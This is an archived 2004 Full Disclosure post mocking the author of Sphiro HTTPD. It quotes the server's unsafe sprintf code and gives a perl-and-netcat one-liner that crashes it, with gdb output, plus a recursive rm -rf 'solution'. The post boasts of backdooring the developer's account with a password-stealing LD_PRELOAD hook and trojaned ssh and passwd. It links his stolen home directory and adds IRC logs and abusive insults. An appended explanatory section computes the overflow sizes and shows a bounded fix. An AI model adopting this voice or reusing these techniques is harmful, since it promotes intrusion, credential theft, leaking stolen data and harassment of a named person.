Full Disclosure mailing list archives
H9-0001 Advisory: Sphiro HTTPD remote heap overflow (Rosiello Security)
From: Slotto Corleone <slotto () gmail com>
Date: Thu, 29 Apr 2004 15:56:50 -0700
Vulnerability: Sphiro HTTPD remote heap overflow
Affected Releases: Sphiro 0.1B by rave aka Jonny Mast
Vendor: http://www.rosiello.org/
Rosiello Security leader: Angelo Rosiello aka guilecool aka ImperialS
ircnet takeover gang irc.taintedknowledge.net #rosiello

Solution: simple steps:
1. find / -name 'sphiro*' -exec rm -rf {} \;
2. don't run code written by "Rosiello Security"
3. troll @ irc.taintedknowledge.net #rosiello

Description:

∙Topic (#rosiello): http://www.rosiello.org Welcome to Rosiello Security | nothing is neglected ! | sphiro httpd --> http://www.taintedknowledge.net/sphiro_release_0.1B.tar.gz -:- 0.2 has superduper multyplexing $rootdude style

Yep, very 1337

-rw-r--r--    1 slotto   users     7123221 Apr 25 07:46 sphiro_release_0.1B.tar.gz

AHHHH wtf, 7mb of source? No... Why the hell is pgp source there?

:~/tmp/sphiro/icons$ ls -l
total 6172
-rw-r--r--    1 slotto   users       11390 Apr 19 13:56 403.jpg
-rw-r--r--    1 slotto   users       17139 Apr 19 13:56 404.jpg
-rw-r--r--    1 slotto   users       37025 Apr 19 13:56 500.jpg
-rw-r--r--    1 slotto   users         243 Aug 31  2002 back.png
-rw-r--r--    1 slotto   users         230 Aug 31  2002 folder.png
-rw-------    1 slotto   users     6230275 Mar 29 09:23 pgp-6.5.1i-beta2.tar.gz
-rw-r--r--    1 slotto   users         250 Aug 31  2002 unknown.png

- sphiro/libhttp/http_socks.c

int get_request(int type,struct sockaddr_in client,int sc,SSL *s)
...
char buffer[MAX_READ +1];
char auth_buff[MAX_READ+1];
char filename[128];
...
if (!(request=strstr(buffer,"GET "))) return -1;
request +=strlen ( "GET ");
if ((pb=strstr(request,"HTTP/1.1")) || (pb=strstr(request,"HTTP/1.1")))
        *(pb -1)='\0';
if ( ( find_rullefile(request) == auth_file_present) ) {
...
sprintf(filename,"%s%s",config->webroot,request);   <-- oops

*** What the fuck? This is written by someone who claims to find, exploit, and release advisories but goes and writes code like this? ***

- sphiro/libhttp/security.c   <-- security? heh

int find_rullefile (char *request)
...
char *filename;
...
filename = (char *) malloc ( strlen(request) + strlen(config->webroot) + strlen ("secure.auth") +1 );
...
sprintf( filename,"%s/%s/secure.auth",config->webroot,request+1);

*** nice attempt to dynamically allocate filename this time. but wait, what if we... ***

perl -e 'print "GET HTTP/1.1" . "A"x1000 . "\n\n"' | nc localhost 1338

request   = "\0"
request+1 = "HTTP/1.1" . "A"x1000 . "\n\n"

ouch!

Core was generated by `./sphiro'.
Program terminated with signal 11, Segmentation fault.
#0  0x400e7123 in mallopt () from /lib/libc.so.6
(gdb) bt
#0  0x400e7123 in mallopt () from /lib/libc.so.6
#1  0x400e61e3 in malloc () from /lib/libc.so.6
#2  0x0804b2a4 in find_rullefile (request=0xbffff414 "") at security.c:62
#3  0x08049d8f in get_request (type=1, client=
      {sin_family = 2, sin_port = 58496, sin_addr = {s_addr = 16777343},
       sin_zero = "Z*\000\000\b@KÆ"}, sc=7, s=0x0) at http_socks.c:259
#4  0x08049c13 in start_daemon (port=91) at http_socks.c:146
#5  0x08049269 in main (argc=1094795585, argv=0x41414141) at sphiro.c:68
(gdb)

Unrelated but funny stories of rave (Jonny Mast) getting owned:

- rave gets his account backdoored on kokanin's box. He finds the obviously placed bindshell stashed as ~/bin/zsh. He laughs and says the backdoor was lame. Well, he obviously missed the getpass() LD_PRELOAD, ssh, and passwd all on his local account mailing all his new passwords out. Oh, and he left an exploit (servu.c) in his directory for the version of servu ftpd he was running on his home windows machine. Oops.

-== Remote Exploit for serv-u version v4.1 [MDTM] ==--
Code by: rave
Contact: rave () rosiello org
Date: Feb 2004

Here is his home directory: http://fogheaven.phrack.nl/rave.tar.gz

Apr 24 08:20:13 <rave> im about to release my httpd
Apr 24 08:21:01 <rave> yes yes opensource
Apr 24 08:25:20 <rave> fixing the release of the httpd
Apr 24 08:27:50 <rave> does this look 1337 or what
Apr 24 08:27:51 <rave> chmod 777 $install/sphiro/{icons,errors}
Apr 24 08:29:10 * rave is working on the install .sh script that works with ./configure and the makefiles
...
Apr 24 08:37:27 <rave> ilja #rosiello misses you
Apr 24 08:38:32 <ilja> no 1 in #rosiello
Apr 24 08:39:35 <rave> i do
Apr 24 08:39:40 <rave> im rosiello
Apr 24 08:39:46 <rave> with 21 others
Apr 24 08:40:02 <rave> at tops since whe linked with 0x557 securitu
Apr 24 08:40:05 <rave> at tops since whe linked with 0x557 security
Apr 24 08:40:42 <rave> <-- mercy has left (Ping timeout)
Apr 24 08:40:46 <rave> hmm
Apr 24 08:41:07 <rave> he died
Apr 24 08:41:16 <rave> on rosiello i think here as well
Apr 24 08:41:25 <rave> my knife actualy worked
Apr 24 08:41:30 <mercy> O_O
Apr 24 08:41:32 <mercy> right
...
Apr 24 10:09:22 <rave> http://www.taintedknowledge.net/images/people/rave.jpg
Apr 24 10:11:30 <rave> http://www.taintedknowledge.net/images/people/rosiello/
...
Apr 24 10:13:01 <ilja> nraziz is a member of rosiello ?
Apr 24 10:13:24 <rave> no
Apr 24 10:13:29 <rave> a visitor
Apr 24 10:13:33 <rave> mercy is a member
Apr 24 10:13:34 <rave> me
Apr 24 10:13:39 <ilja> mercy is ?
Apr 24 10:13:43 <ilja> didn't know that
Apr 24 10:13:50 <rave> ex w00w00 what his name again
Apr 24 10:13:55 <rave> and angelo
Apr 24 10:14:10 <rave> ex w00w00 napster
Apr 24 10:14:26 <rave> angelo,rave,napster,mercy
Apr 24 10:14:38 <ilja> mercy is really in rosiello ?
Apr 24 10:14:42 <ilja> i though you were kidding
Apr 24 10:15:06 <rave> no im not
...
Apr 24 10:17:23 <rave> no
Apr 24 10:17:33 <rave> angelo has some lag in updating the site
Apr 24 10:17:48 <rave> i was like 3 months in rosiello and still the site sayed
Apr 24 10:17:52 <rave> angelo,phinix
Apr 24 10:17:58 <rave> *phunix
Apr 24 10:18:07 <_demiurge> hey rave
Apr 24 10:18:19 <rave> in the mean while i released 6 remote exploits for windows
...

a few hours later ...

... rave finds out GOBBLES hacked drunken.fi.st ...

Apr 24 13:25:18 <rave> KOKANIN UR BOX IS FUKCING HACKED AND ALL MY STUFF IS GONE!!!!!!!!!
Apr 24 13:25:19 <rave> ty
Apr 24 13:25:45 <rave> eted
Apr 24 13:25:45 <rave> <calibre> hmm
Apr 24 13:25:49 <rave> oops
Apr 24 13:26:02 <rave> /usr/X11R6/bin/xauth: timeout in locking authority file /home/rave/.Xauthorityhi from GOBBLES
Apr 24 13:26:02 <rave> rm: /home/GOBBLES_rave: Permission denied
Apr 24 13:26:02 <rave> cp: /tmp/suid_shell_rave: Permission denied
Apr 24 13:26:02 <rave> chmod: /tmp/suid_shell_rave: Operation not permitted
Apr 24 13:26:02 <rave> rave@drunken:~ $ls
Apr 24 13:26:03 <rave> rave@drunken:~ $ls
Apr 24 13:26:04 <rave> rave@drunken:~ $dir
Apr 24 13:26:06 <rave> -bash: dir: command not found
Apr 24 13:26:08 <rave> rave@drunken:~ $ls
Apr 24 13:26:12 <rave> rave@drunken:~ $
Apr 24 13:26:16 <rave> where is my research
Apr 24 13:26:59 <rave> who the fuck has bee g00fing on that box ?, report to me and ile show u how mad i am
Apr 24 13:27:16 <rave> that is like 2 years of research missig stupid fucks
Apr 24 13:27:24 <rave> bah
Apr 24 13:28:58 <rave> sorry i didnt realy intended to react like that but im mad i hope there are backups some where

Here is your backup rave: http://fogheaven.phrack.nl/rave.tar.gz

--- signature ---

chris, go fuck a horse you cockknocker

| chris (~chris () crew tkn us) (United States of America)
| ircname  : chris
| channels : @#rosiello #knasboll.se #rootshell #tkn
| server   : irc.tx.us.taintedknowledge.net (Sponsored By Project 9 Studios)
| register : chris - is a registered nick
| operator : chris (is NOT an IRC warrior)
∙φ∙ You have been Network-Banned.

This terrorism was funded by:
Kajun, thanks for social engineering rave and taking the blame
boobys.org, LOL ROFFLE
<sorbo> Slotto Corleone, the mafia boss of the Internet
#plan9, GNU assault team

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
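The post above quotes two length bugs but does not spell out the arithmetic behind either. The example below is added here and is not code from the post or from the Sphiro source: it reproduces both size calculations on constructed input (no overflow is actually performed), then shows a bounded replacement for the find_rullefile() construction. The get_request() case is a stack overflow (filename[128] is a local); the find_rullefile() case is the heap overflow of the advisory title, because malloc() is sized from strlen(request) while sprintf() formats request+1, and the crafted request from the post has its '\0' in the first byte. The webroot "/var/www", the helper names, and the sample requests are assumptions of this example, and config->webroot is modelled as a plain argument.

```c
/* Added example, not Sphiro's code. Assumed: webroot "/var/www", helper names. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define FILENAME_SZ 128            /* char filename[128] in get_request()   */
#define AUTH_FILE   "secure.auth"  /* literal appended by find_rullefile() */

/* Bytes that sprintf(filename,"%s%s",webroot,request) writes, NUL included. */
size_t get_request_needed(const char *webroot, const char *request)
{
    return strlen(webroot) + strlen(request) + 1;
}

/* How far that write runs past char filename[128]; 0 if it fits. */
size_t get_request_overflow(const char *webroot, const char *request)
{
    size_t need = get_request_needed(webroot, request);
    return need > FILENAME_SZ ? need - FILENAME_SZ : 0;
}

/* The size find_rullefile() hands to malloc(): it measures request ...      */
size_t find_rullefile_alloc(const char *webroot, const char *request)
{
    return strlen(request) + strlen(webroot) + strlen(AUTH_FILE) + 1;
}

/* ... but sprintf("%s/%s/secure.auth", webroot, request+1) formats request+1,
 * so the bytes written depend on whatever follows the first NUL in memory.  */
size_t find_rullefile_needed(const char *webroot, const char *request)
{
    return strlen(webroot) + 1 + strlen(request + 1) + 1 + strlen(AUTH_FILE) + 1;
}

size_t find_rullefile_overflow(const char *webroot, const char *request)
{
    size_t alloc = find_rullefile_alloc(webroot, request);
    size_t need  = find_rullefile_needed(webroot, request);
    return need > alloc ? need - alloc : 0;
}

/* Constructed input: the request pointer as the post describes it once the
 * server has stored its '\0': an empty string followed in memory by
 * "HTTP/1.1" . "A"x1000 . "\n\n" (the perl one-liner's payload). */
const char *crafted_request(void)
{
    static char buf[1 + 8 + 1000 + 2 + 1];
    buf[0] = '\0';
    memcpy(buf + 1, "HTTP/1.1", 8);
    memset(buf + 9, 'A', 1000);
    buf[1009] = '\n';
    buf[1010] = '\n';
    buf[1011] = '\0';
    return buf;
}

/* Constructed input for the stack case: "/" followed by 1000 'A's. */
const char *long_path_request(void)
{
    static char buf[1 + 1000 + 1];
    buf[0] = '/';
    memset(buf + 1, 'A', 1000);
    buf[1001] = '\0';
    return buf;
}

size_t demo_stack_overflow_bytes(void)
{
    return get_request_overflow("/var/www", long_path_request());
}

size_t demo_heap_overflow_bytes(void)
{
    return find_rullefile_overflow("/var/www", crafted_request());
}

/* Bounded replacement: refuse to step over a terminator, size the buffer from
 * exactly the strings that get formatted, and let snprintf() report truncation
 * instead of trusting hand-written arithmetic. Returns NULL on any failure. */
char *build_auth_path(const char *webroot, const char *request)
{
    const char *path;
    size_t need;
    char *out;
    int n;

    if (request[0] == '\0')            /* request+1 would step past the NUL */
        return NULL;
    path = request + 1;                /* same skip-one-byte as the original */
    need = strlen(webroot) + 1 + strlen(path) + 1 + strlen(AUTH_FILE) + 1;
    out = malloc(need);
    if (out == NULL)
        return NULL;
    n = snprintf(out, need, "%s/%s/%s", webroot, path, AUTH_FILE);
    if (n < 0 || (size_t)n >= need) {
        free(out);
        return NULL;
    }
    return out;
}

/* 1 if build_auth_path() succeeds and yields exactly `expect`, else 0. */
int auth_path_is(const char *webroot, const char *request, const char *expect)
{
    char *p = build_auth_path(webroot, request);
    int ok = (p != NULL && strcmp(p, expect) == 0);
    free(p);
    return ok;
}

int main(void)
{
    printf("get_request: %zu bytes past filename[%d]\n",
           demo_stack_overflow_bytes(), FILENAME_SZ);
    printf("find_rullefile: %zu bytes past the malloc'd block\n",
           demo_heap_overflow_bytes());
    return 0;
}
```

With the constructed inputs the get_request() write overruns filename[128] by 882 bytes and the find_rullefile() write overruns its 20-byte allocation by 1012 bytes, which is strlen(request+1) plus the two separators the format string adds. The check for request[0] == '\0' is the part that matters: sizing from the formatted strings fixes the arithmetic, but stepping over a terminator is what let the allocation and the write disagree in the first place.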
Current thread:
- H9-0001 Advisory: Sphiro HTTPD remote heap overflow (Rosiello Security) Slotto Corleone (Apr 29)
- Re: H9-0001 Advisory: Sphiro HTTPD remote heap overflow (Rosiello Security) Richard Johnson (Apr 29)
- Re: H9-0001 Advisory: Sphiro HTTPD remote heap overflow (Rosiello Security) Slotto Corleone (Apr 30)
- <Possible follow-ups>
- H9-0001 Advisory: Sphiro HTTPD remote heap overflow (Rosiello Security) Slotto Corleone (Apr 29)
- Re: H9-0001 Advisory: Sphiro HTTPD remote heap overflow (Rosiello Security) morning_wood (Apr 29)
- Re: H9-0001 Advisory: Sphiro HTTPD remote heap overflow (Rosiello Security) Slotto Corleone (Apr 30)
- Re: H9-0001 Advisory: Sphiro HTTPD remote heap overflow (Rosiello Security) morning_wood (Apr 30)
- Re: H9-0001 Advisory: Sphiro HTTPD remote heap overflow (Rosiello Security) morning_wood (Apr 29)
- Re: H9-0001 Advisory: Sphiro HTTPD remote heap overflow (Rosiello Security) 3APA3A (Apr 30)
- Re: H9-0001 Advisory: Sphiro HTTPD remote heap overflow (Rosiello Security) Slotto Corleone (Apr 30)
- Re: H9-0001 Advisory: Sphiro HTTPD remote heap overflow (Rosiello Security) Richard Johnson (Apr 29)